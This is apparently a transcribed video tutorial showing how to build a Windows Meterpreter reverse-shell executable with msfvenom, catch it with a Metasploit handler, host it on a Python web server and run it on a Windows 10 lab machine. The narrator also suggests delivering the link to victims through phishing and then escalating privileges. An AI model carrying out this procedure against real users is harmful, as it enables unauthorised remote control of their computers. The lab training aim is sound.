Hello everyone, this is Cyber Avali, and today we are going to create a virus or a malware inside Ubuntu, and I'm going to show you everything. Like the Ubuntu machine is going to be the attacker, and the Windows machine is going to be the victim machine. So we are going to create the malware or the virus inside the Ubuntu. Then we are going to create a server inside Python, and after that, we are going to run the virus inside Windows 10, and we're gonna see what's gonna happen next, and do we get the details that we need or not. So first of all, you have to make sure that your Ubuntu and Windows machine should be inside the same network, so they can communicate between each other. And now here's something that I want to tell you, that okay, let's assume that you're the attacker, and you say like, okay, how I can make sure that we are in the same network. Like, you don't have to do that, because we have something like phishing emails that I already covered in my YouTube channel. So you can see from here, it's installing, and then this one is preparing Ubuntu for phishing emails, and then the other three is all the analyzing phishing emails and how to make phishing emails and how you can detect them, and you can analyze them inside TCP dump or even Wireshark. So you can go and check these lessons out, and they're all free and they're all practical. So that's how you can send the file or the virus to the victim machine. Okay, if you want to ask me like why we are not on the same network, so how I can do that. And also, I want to point out one thing more, that this is only for educational purposes. So first we have to make sure that these two machines are on the same network. So all we have to do first, like if it's the first time, you have to come right here to the files, then to the tools, and after that network manager. So inside NAT network, you can see that I already created a NAT network called Cybersecurity Professionals. Okay, and you can create right here anything you want, and after that you're gonna come on the Ubuntu machine and then on the settings. So you have to make sure that the both machines are on the same network. Then you come to the network, and you can see I already checked the adapter one, and it's the NAT network, and then here is the cyber security. And the other thing, it's called this one, the mode should be allowed on all VMware. Okay, and the same thing goes with the Windows 10 right here. So if I come to the setting right here and then to the network, then you can see Cybersecurity Professional and NAT network. So you can see that I'm on the same network. Now we all have all we have to do is go and create the virus or the malware inside the Ubuntu. And also I prepared a note right here, so you can get all the links and all the information that I'm doing in this video. You can get all these notes from this page, Cybersecurity Professionals. So I'm putting all my notes right here, and it's all free, so you can go and get it. And it's all about networking and how to become a SOC analyst. So by the time that you are watching this video, the notes going to be right here, it's uploaded. And let's go and to the Ubuntu machine. So right here you can see I'm inside my Ubuntu machine. All I have to do is I'm going to type my password, and right here you can see that I'm going to the terminal, and then right here if I go to Google ping, okay, 8.8.8.8, and you can see I'm getting the reply. But sometimes what's happening is you're not connected to the internet while you're connecting the virtual machines inside the same network. That's why we are going to do, like, come to the setting, okay, go to the network tab, then just check the adapter 2, and it's going to be the bridge, okay, the bridge adapter, and also allow all, and the same goes with the Windows 10. So that's how you're connected to the internet, and also your machines are going to be in the same network. So the adapter 1 is going to make sure that all the VMwares are on the same network, and the adapter 2 is going to make sure that you are connected to the internet. And with that being said, let's go right here. Okay, So you can see, okay, I'm going to press Ctrl C, then clear. And right here from the notes, I already provided you guys a link that you just can copy and paste this link. So this is the Rapid7 site, which I'm going to get the Metasploit from them to install it on Ubuntu. And all I have to do is right here. Okay, so I'm going to copy this one. Okay, it says installing the Metasploit framework on Linux. So right here I'm going to paste it and then press enter. Okay guys, so right now I installed the Metasploit on the Ubuntu machine. So I'm just typing my password right here. And in here, I have to run in terminal, I'm going to run the msf console. So it's gonna run the Metasploit for me. And okay, so right now I'm in Metasploit. Okay, so right now all I have to do is I'm going to use the msfvenom to create the payload. So then we can use the payload and just create our file to transfer to the victim machine. So for that I'm going to press Ctrl+Shift+T to create a new to open up a new terminal. And you can see right here that I already created a folder which is empty, malware, on my desktop. So right here I'm going to type ls and then cd desktop. So it's important to be to the folder to create our a payload inside the folder, which we are going to run the server from that folder. So you're gonna understand everything. Just give me a second. And right now I'm going to cd malware. Okay, so right now you can see I'm inside the folder. So right here I'm going to create the payload. And the payload, it's going to be I'm going to use the msfvenom, which this one is, it's a generation tool or utility that we can create a reverse shell or kind of a command and control operation on the Windows machine. So for that I'm going to type first the msfvenom. Okay, msfvenom, then -p, so I can identify the type of my payload, which is going to be on Windows. And then after that I'm going to define the type of handler, which is a meter. And after that the type of payload, that it's going to be a reverse shell or a reverse TCP. And after that I'm going to type the L host. Okay, this one is important because I need to know what's my IP address. For that you can just open up a new tab and call IP address. So if you can see, it's in my NP0H3 my IP address is 10.15. Okay, so I'm going to copy this one. I'm just going to paste it right here. And then I have to define the port that I'm using, which is quad 4. And right now I'm going to put a -f, which the file type, which is on Windows, and that's going to be an executable file or a .exe file. And then I'm going to provide the -o, which is for output, or the name of the file that I'm going to create, which I'm going to put cybervalley.exe. And when I click enter, so I should have my file inside my malware folder. Okay, no platform was selected, choosing MSF. Okay, wait a minute. So msfvenom, Windows reverse TCP. Reverse Metasploit. Okay. Windows msfvenom. Oh, Cyber Valley. There's something wrong with the IP address, and okay, let's do one more. This time I'm going, okay, okay. So you can see that I put it to space for the L port and also for the L host, and that's why it didn't create. So right now you can see I have my file. So I'm going to just minimize this one. Okay, if I see my folder, so you can see right here that I have my file, and right here that I created the payload. Now it's time to go back to the Metasploit, and right here, first I'm going to set up the type of handler, and after that I'm going to use the payload that I already created. And for that, all you have to do is come to the Metasploit and type right here, use exploit, and then multi handler. Okay, handler. Okay, using, okay, so it did generate the generic shell, and after that we have to define our payload, and for that I'm going to use the set command, set payload. Okay, set payload, and right here I'm going to type Windows, and interpreter reverse TCP, and I'm going to enter. Okay, so right now I'm going to provide the IP address of my Ubuntu machine, and for that I'm going to put lhost, and no, actually I have to first set, and then I'm going to create lhost, and right here you can just type np 0 is 3 or your Ubuntu IP address, both can work the same. So I just using my np0 is 3, and ready, and after that I'm going to set the L port, and the port is quad 4. Okay, and after that all I have to do is just type exploit. Okay, so right now we just started a reverse TCP handler on the 10.02.15, which is our Ubuntu machine. And right now, first we have to create a server inside the Python, so our client machine or the victim machine can download that the virus or the malware that we just created. So for that, just open up a new tab inside terminal, and right here it's important to go to the folder that we created the virus. Okay, so right here I'm going to ls cd desktop, and then cd malware, and then if I type, so you can see my file right there. And right here I'm going to create the server using python 3-m HTTP server, and using port 8000. So right now you can see that I'm running the server on port 8000. So it's time to go back to the Windows 10 right here. So I'm just typing my password. Okay, and right here all we have to do is just go to the internet browser, whether you're using Mozilla, Chrome, or Firefox. So as it's for only it's inside lab, so I only have like, what's the name for this, H, yeah, so I have the H one. So I'm going to provide my server, my Ubuntu's IP address with the port that my server is running. So for that I'm going to use HTTP, and you can see that it's HTTP, the IP address of my Ubuntu, and the port that my server is running. So if I click enter, you can see the file right here. And you know what, if it was inside a phishing email, you just can simply put the link inside the phishing email and send it to the client or to the victim machine, and they can download the virus or the malware that we just created from here. And if we have more files inside that malware folder, they're gonna see those all files. So that server is running on the folder called malware, and that's why I told you to create your server on the folder, so the client or the victim machine have access to the folder that we already provided. So for that, so right now if I click on this one, and if I say keep, then keep anyway. Okay, just wait a second. Let's check this one. Why it got detected? Because we actually we didn't spend much time on this creating virus, this one, but you know, like the hacker or the guy who want to compromise our machine, they are going to spend much more time and going to use more advanced syntax than the simple syntax that we just used. So I'm going to do it once more, and I know that it's in download folder. So for that I'm going to the cmd. Right here I'm going to run as administrator, yes, and right here I'm going to cd c, and I know it's in users, and after that it's going to be Windows 10 SOC. Okay, and after that it's going to be in downloads. So if I type right here dir, so it's going to show me the file. So I should have the file, yeah, you can see right there, it's called Cyber Avali. So if I Cyber Avali, okay, now that we ran our malware, let's go back to our listening server, and you can see, okay, right here you see it started reverse TCP handler on our Ubuntu machine using port quad 4, and then sending it back from the Windows machine, which is this one, the IP address of this one, and you can see emitter per session. So we are going to dive into network analyzing and process in the next one, but this is how you can connect back from the victim machine to our machine, and we successfully launched the reverse type or the command and control operation on the victim or on the Windows machine. And this is how you can gain access to the victim machine, and it was simple. You just created a payload, after that created a server and put the link inside the phishing email or any kind of social media that you guys are using, and when he download that one, you got access to his machine. And after that you can just escalate your privilege to the administration, and you can just compromise the whole system. So that's it for this one, and don't forget to check out the other videos. It's all important if you want to be a SOC analyst or a cybersecurity security analyst. These are all important lessons to you guys, so these are all practical. And don't forget to get the notes from this page, cybersecurity professionals. And thank you guys, and wishing you a good day. Also, don't forget to comment below what you're thinking about this one, and also how we can escalate this one to the next level. And that's it. Thank you everyone, and have a good day.